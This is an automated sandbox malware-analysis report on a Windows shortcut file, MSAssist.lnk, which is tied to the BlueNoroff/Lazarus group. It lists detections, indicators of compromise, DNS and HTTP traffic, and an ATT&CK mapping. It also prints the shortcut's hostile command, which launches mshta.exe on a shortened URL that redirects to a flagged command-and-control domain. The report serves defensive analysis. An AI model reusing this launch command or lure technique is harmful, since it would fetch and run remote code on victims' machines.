Edit tour

Windows Analysis Report
MSAssist.lnk

Overview

General Information

Sample Name:	MSAssist.lnk
Analysis ID:	796588
MD5:	483e3e0b1dceb4a5a13de65d3556c3fe
SHA1:	e8b0785e58fd864c16fe4a58ee734d0fc93702e5
SHA256:	b7533ae3057764c8734ebdea13e766eaa92ad38f7ab41bb267b9b44a550e1507
Tags:	lnk
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Yara detected malicious lnk

Snort IDS alert for network traffic

Found URL in windows shortcut file (LNK)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

JA3 SSL client fingerprint seen in connection with other malware

Connects to a URL shortener service

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6132 cmdline: "C:\WINDOWS\system32\mshta.exe" https://bit.ly/35FlWc2 MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
MSAssist.lnk	JoeSecurity_MalLnk	Yara detected malicious lnk	Joe Security

Snort Signatures

ET TROJAN Lazarus APT Related CnC Domain in DNS Lookup (page .googledocpage .com) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861787532033450 02/02/23-00:31:43.192577
SID:	2033450
Source Port:	61787
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: MSAssist.lnk	ReversingLabs: Detection: 56%
Source: MSAssist.lnk	Virustotal: Detection: 50%			Perma Link

Antivirus detection for URL or domain

Source: https://page.googledocpage.com/	Avira URL Cloud: Label: malware
Source: https://page.googledocpage.com/WiU	Avira URL Cloud: Label: malware
Source: https://page.googledocpage.com/I	Avira URL Cloud: Label: malware
Source: https://page.googledocpage.com/z	Avira URL Cloud: Label: malware
Source: https://page.googledocpage.com/U	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: page.googledocpage.com	Virustotal: Detection: 12%			Perma Link
Source: https://page.googledocpage.com/	Virustotal: Detection: 12%			Perma Link

Source: unknown

HTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49696 version: TLS 1.2

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2033450 ET TROJAN Lazarus APT Related CnC Domain in DNS Lookup (page .googledocpage .com) 192.168.2.3:61787 -> 8.8.8.8:53

Source: global traffic

HTTP traffic detected: GET /35FlWc2 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bit.lyConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Windows\System32\mshta.exe

DNS query: name: bit.ly

Source: Joe Sandbox View	IP Address: 67.199.248.10 67.199.248.10
Source: Joe Sandbox View	IP Address: 67.199.248.10 67.199.248.10

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443

Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/
Source: mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66C017000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66BFB0000.00000004.00000020.00020000.00000000.sdmp, MSAssist.lnk	String found in binary or memory: https://bit.ly/35FlWc2
Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/35FlWc2...
Source: mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/35FlWc2B
Source: mshta.exe, 00000000.00000002.524050952.000001D66BFB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/35FlWc2C:
Source: mshta.exe, 00000000.00000002.524050952.000001D66BFB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/35FlWc2S
Source: mshta.exe, 00000000.00000002.524417090.000001D66C1B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/35FlWc2aHOMEDRIVE
Source: mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/35FlWc2r
Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/r3
Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://page.googledocpage.com/
Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://page.googledocpage.com/I
Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://page.googledocpage.com/U
Source: mshta.exe, 00000000.00000003.257329635.000001DE6E1B4000.00000004.00000020.00020000.00000000.sdmp, 35FlWc2[1].htm.0.dr	String found in binary or memory: https://page.googledocpage.com/WiU
Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://page.googledocpage.com/z

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: global traffic

Source: unknown

HTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49696 version: TLS 1.2

System Summary

Yara detected malicious lnk

Source: Yara match

File source: MSAssist.lnk, type: SAMPLE

Found URL in windows shortcut file (LNK)

Source: Initial file

Strings: https://bit.ly/35FlWc2%wN

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: MSAssist.lnk	ReversingLabs: Detection: 56%
Source: MSAssist.lnk	Virustotal: Detection: 50%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: MSAssist.lnk

LNK file: ..\..\..\..\..\WINDOWS\system32\mshta.exe

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: classification engine

Classification label: mal84.rans.troj.winLNK@1/1@2/1

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: mshta.exe, 00000000.00000002.524050952.000001D66C017000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66C090000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Spearphishing Link	Windows Management Instrumentation	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MSAssist.lnk	56%	ReversingLabs	Shortcut.Trojan.BlueNoroff
MSAssist.lnk	50%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
page.googledocpage.com	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://page.googledocpage.com/	100%	Avira URL Cloud	malware
https://page.googledocpage.com/	12%	Virustotal		Browse
https://page.googledocpage.com/WiU	100%	Avira URL Cloud	malware
https://page.googledocpage.com/I	100%	Avira URL Cloud	malware
https://page.googledocpage.com/z	100%	Avira URL Cloud	malware
https://page.googledocpage.com/U	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bit.ly	67.199.248.10	true	false		high
page.googledocpage.com	unknown	unknown	false	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bit.ly/35FlWc2	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bit.ly/35FlWc2C:	mshta.exe, 00000000.00000002.524050952.000001D66BFB0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bit.ly/35FlWc2r	mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bit.ly/35FlWc2S	mshta.exe, 00000000.00000002.524050952.000001D66BFB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bit.ly/35FlWc2aHOMEDRIVE	mshta.exe, 00000000.00000002.524417090.000001D66C1B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://page.googledocpage.com/I	mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://page.googledocpage.com/	mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://page.googledocpage.com/U	mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bit.ly/35FlWc2B	mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bit.ly/	mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	false		high
https://page.googledocpage.com/WiU	mshta.exe, 00000000.00000003.257329635.000001DE6E1B4000.00000004.00000020.00020000.00000000.sdmp, 35FlWc2[1].htm.0.dr	true	Avira URL Cloud: malware	unknown
https://page.googledocpage.com/z	mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bit.ly/35FlWc2...	mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bit.ly/r3	mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
67.199.248.10	bit.ly	United States		396982	GOOGLE-PRIVATE-CLOUDUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	796588
Start date and time:	2023-02-02 00:30:44 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	MSAssist.lnk
Detection:	MAL
Classification:	mal84.rans.troj.winLNK@1/1@2/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:31:43	API Interceptor	1x Sleep call for process: mshta.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.10	BankStatement-1674477258.dll	Get hash	malicious	Browse	bit.ly/3J1os10
	Bank_Of_America_Bank_Statement__6202068pdf.hta	Get hash	malicious	Browse	bit.ly/3WGTfE4
	http://bit.ly/3BBehNg	Get hash	malicious	Browse	bit.ly/3BBehNg
	http://92.35.66.155	Get hash	malicious	Browse	bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
	http://23.129.64.210	Get hash	malicious	Browse	bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
	http://23.129.64.149	Get hash	malicious	Browse	bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
	http://23.129.64.137	Get hash	malicious	Browse	bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
	http://bit.ly/3IgBV1c	Get hash	malicious	Browse	bit.ly/3IgBV1c
	New RFQ PDF.ppam	Get hash	malicious	Browse	bit.ly/aXkVPnTMXsq15
	New PO-0183HT PDF.ppam	Get hash	malicious	Browse	bit.ly/aXzovafQOBF27
	New RFQ PDF.ppam	Get hash	malicious	Browse	bit.ly/ayVreJYnrrX14
	New PO-0183HT PDF.ppam	Get hash	malicious	Browse	bit.ly/adDIcLEBGae21
	New PO-0183HT PDF.ppam	Get hash	malicious	Browse	bit.ly/aYqFdXgsoCB20
	New PO-0183HT PDF.ppam	Get hash	malicious	Browse	bit.ly/albhKoifAMz22
	New RFQ PDF.ppam	Get hash	malicious	Browse	bit.ly/aKMbRpAFXeS4
	New RFQ PDF.ppam	Get hash	malicious	Browse	bit.ly/aDlvUffdiSd8
	New RFQ PDF.ppam	Get hash	malicious	Browse	bit.ly/abKuaKhJgGc12
	New RFQ PDF.ppam	Get hash	malicious	Browse	bit.ly/aUvBnewTVbn13
	New RFQ PDF.ppam	Get hash	malicious	Browse	bit.ly/aBCESQxSDPe9

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	po3P6XiL1j.exe	Get hash	malicious	Browse	67.199.248.10
	https://1drv.ms/w/s!AmHLPfLT0gWKeSkOi-PJigCgOdw	Get hash	malicious	Browse	67.199.248.10
	https://1drv.ms/w/s!AvjysAtIHaDAbbckaNWOeYbWYEI	Get hash	malicious	Browse	67.199.248.10
	https://1drv.ms/w/s!AgmZv4mIayhmcQOv4nGgzVScorc	Get hash	malicious	Browse	67.199.248.11
	https://1drv.ms/w/s!ApoqfyGvCl1CarNDIp4XJEcDZhQ	Get hash	malicious	Browse	67.199.248.11
	https://1drv.ms/w/s!Av2X_TI0iGesdVmLCSC_aXZHcOQ	Get hash	malicious	Browse	67.199.248.10
	Voice Call Transmitter.html	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/3CVqxba	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3H9siTf	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/3iYdDSW	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3H3BYyK	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3Ho4MDy	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3XxS4Yy	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3kC7V9C	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3kC7V9C	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/PhotoMrSalvadorFarrels	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/PhotoMrSalvadorFarrels	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3whG2X4	Get hash	malicious	Browse	67.199.248.11
	BankStatement-1674477258.dll	Get hash	malicious	Browse	67.199.248.11
	BankStatement-1674477258.dll	Get hash	malicious	Browse	67.199.248.10

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLE-PRIVATE-CLOUDUS	po3P6XiL1j.exe	Get hash	malicious	Browse	67.199.248.10
	https://1drv.ms/w/s!AmHLPfLT0gWKeSkOi-PJigCgOdw	Get hash	malicious	Browse	67.199.248.10
	https://1drv.ms/w/s!AquTHBwcw80HgQN2jRpoSs_o-Baz	Get hash	malicious	Browse	67.199.248.11
	https://1drv.ms/w/s!AvjysAtIHaDAbbckaNWOeYbWYEI	Get hash	malicious	Browse	67.199.248.11
	Wez57HGpHA.elf	Get hash	malicious	Browse	148.99.216.47
	https://1drv.ms/w/s!AgmZv4mIayhmcQOv4nGgzVScorc	Get hash	malicious	Browse	67.199.248.11
	https://1drv.ms/w/s!ApoqfyGvCl1CarNDIp4XJEcDZhQ	Get hash	malicious	Browse	67.199.248.11
	https://1drv.ms/w/s!Av2X_TI0iGesdVmLCSC_aXZHcOQ	Get hash	malicious	Browse	67.199.248.10
	https://1drv.ms/w/s!AvKduNrfzZs-eenfIPWKO-Uj5wg	Get hash	malicious	Browse	67.199.248.10
	Voice Call Transmitter.html	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/3CVqxba	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3H9siTf	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/3iYdDSW	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3H3BYyK	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3Ho4MDy	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3XxS4Yy	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3kC7V9C	Get hash	malicious	Browse	67.199.248.10
	https://bit.ly/3kC7V9C	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/PhotoMrSalvadorFarrels	Get hash	malicious	Browse	67.199.248.11
	https://bit.ly/PhotoMrSalvadorFarrels	Get hash	malicious	Browse	67.199.248.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Invoice_suspect.html	Get hash	malicious	Browse	67.199.248.10
	Payment Details Report(01-31-2023).htm	Get hash	malicious	Browse	67.199.248.10
	DEavgZUkWw.exe	Get hash	malicious	Browse	67.199.248.10
	v0WJE3eugq.exe	Get hash	malicious	Browse	67.199.248.10
	v0WJE3eugq.exe	Get hash	malicious	Browse	67.199.248.10
	https://netorg6283783-my.sharepoint.com/:b:/g/personal/eccadmin_eccog_org/EYTixuYEVddMgiD9r7Qxh84B7bjtQuXghkr6YhYIKU6_ag?e=4%3anz465M&at=9	Get hash	malicious	Browse	67.199.248.10
	file.exe	Get hash	malicious	Browse	67.199.248.10
	https://app.box.com/s/4kdyl3nzsjjppx0mraq9ir7dg3ciu62f	Get hash	malicious	Browse	67.199.248.10
	Invoice #DC 83-1462-K2-0.hTm	Get hash	malicious	Browse	67.199.248.10
	file.exe	Get hash	malicious	Browse	67.199.248.10
	Pago&Calendario.xls	Get hash	malicious	Browse	67.199.248.10
	Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f_20222322.htm	Get hash	malicious	Browse	67.199.248.10
	https://ihgoa.com/	Get hash	malicious	Browse	67.199.248.10
	Wells_Fargo_Transfer_Receipt.pif.exe	Get hash	malicious	Browse	67.199.248.10
	Shared Docs.shtml	Get hash	malicious	Browse	67.199.248.10
	EFT Payment - virtualintelligencebriefing.com.htm	Get hash	malicious	Browse	67.199.248.10
	KUqLVaGmei.exe	Get hash	malicious	Browse	67.199.248.10
	KUqLVaGmei.exe	Get hash	malicious	Browse	67.199.248.10
	merchantsnat_Employee-Benefits_Handbook.htm	Get hash	malicious	Browse	67.199.248.10
	https://decdesign.com.ar/	Get hash	malicious	Browse	67.199.248.10

Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	162
Entropy (8bit):	5.159765412808528
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyrDLCRKkKCECALRu3UQj2rEGqH8HbQFSXbKFvNGb:qFzLIeco3XLx92rDLElXECAL81jAE1HW
MD5:	AA1E6618B0505B52BE213A1FD0E6789F
SHA1:	9FAD86C2E997D331693BE1C43455518984CD3728
SHA-256:	C94B2CD2E12B5E10811A8E7CB481D20CA52D54FFD505AD0A0DB4F56603F75B1D
SHA-512:	FBA0D7E93B7C292ED5A34DB93FE2D8BEF20E6AE554C6C68C635CF097478F614D59363789DE7D59DEBC9E939CFE5BFA7CCFD05DE87361BB0B05A18AE480218BDF
Malicious:	false
Reputation:	low
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="https://page.googledocpage.com/WiU+Q6cgIESl8BPJ/swFnyqX1uFiFiTyQY6yZbnIMwc=">moved here</a></body>.</html>

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):	3.240480772569893
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	MSAssist.lnk
File size:	720
MD5:	483e3e0b1dceb4a5a13de65d3556c3fe
SHA1:	e8b0785e58fd864c16fe4a58ee734d0fc93702e5
SHA256:	b7533ae3057764c8734ebdea13e766eaa92ad38f7ab41bb267b9b44a550e1507
SHA512:	a046eea9fb46b78f5cd49cd3505be1951ea6f088568dc70fce662f47d2d2a21d18871995f04803267ee20535b67476d3b40b4f3f10dbbb41f978440f195746f9
SSDEEP:	12:8AlX6m/VnEXzzeMDGR22efeDJLgc4iN37+lbYqlTRUAN1r8:8Abtn46pefe5g6rab/nUAN
TLSH:	3701270C1E8A1B22C375CD3754DFA316C9393D86FEA28F2A40E05BC96429100B5A6C2E
File Content Preview:	L..................F........................................................;....P.O. .:i.....+00.../C:\...................V.1...........WINDOWS.@.............................................W.I.N.D.O.W.S.....Z.1...........system32..B.....................

File Icon


Icon Hash:	858db080828181ad

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\..\WINDOWS\system32\mshta.exe
Command Line Argument:	https://bit.ly/35FlWc2
Icon location:

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.38.8.8.861787532033450 02/02/23-00:31:43.192577	UDP	2033450	ET TROJAN Lazarus APT Related CnC Domain in DNS Lookup (page .googledocpage .com)	61787	53	192.168.2.3	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 2, 2023 00:31:42.584640980 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:42.584697008 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:42.584805012 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:42.602818012 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:42.602849007 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:42.665455103 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:42.665630102 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:42.986608028 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:42.986654043 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:42.987282038 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:42.987384081 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:42.990633965 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:42.990659952 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:43.106046915 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:43.106231928 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:43.106270075 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:43.106331110 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:43.107316017 CET	443	49696	67.199.248.10	192.168.2.3
Feb 2, 2023 00:31:43.107397079 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:43.146764040 CET	49696	443	192.168.2.3	67.199.248.10
Feb 2, 2023 00:31:43.146814108 CET	443	49696	67.199.248.10	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 2, 2023 00:31:42.549252033 CET	61626	53	192.168.2.3	8.8.8.8
Feb 2, 2023 00:31:42.568176985 CET	53	61626	8.8.8.8	192.168.2.3
Feb 2, 2023 00:31:43.192576885 CET	61787	53	192.168.2.3	8.8.8.8
Feb 2, 2023 00:31:43.216392994 CET	53	61787	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 2, 2023 00:31:42.549252033 CET	192.168.2.3	8.8.8.8	0xcd11	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)	false
Feb 2, 2023 00:31:43.192576885 CET	192.168.2.3	8.8.8.8	0x612d	Standard query (0)	page.googledocpage.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 2, 2023 00:31:42.568176985 CET	8.8.8.8	192.168.2.3	0xcd11	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)	false
Feb 2, 2023 00:31:42.568176985 CET	8.8.8.8	192.168.2.3	0xcd11	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)	false
Feb 2, 2023 00:31:43.216392994 CET	8.8.8.8	192.168.2.3	0x612d	Name error (3)	page.googledocpage.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bit.ly

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49696	67.199.248.10	443	C:\Windows\System32\mshta.exe

Timestamp	Direction	Data
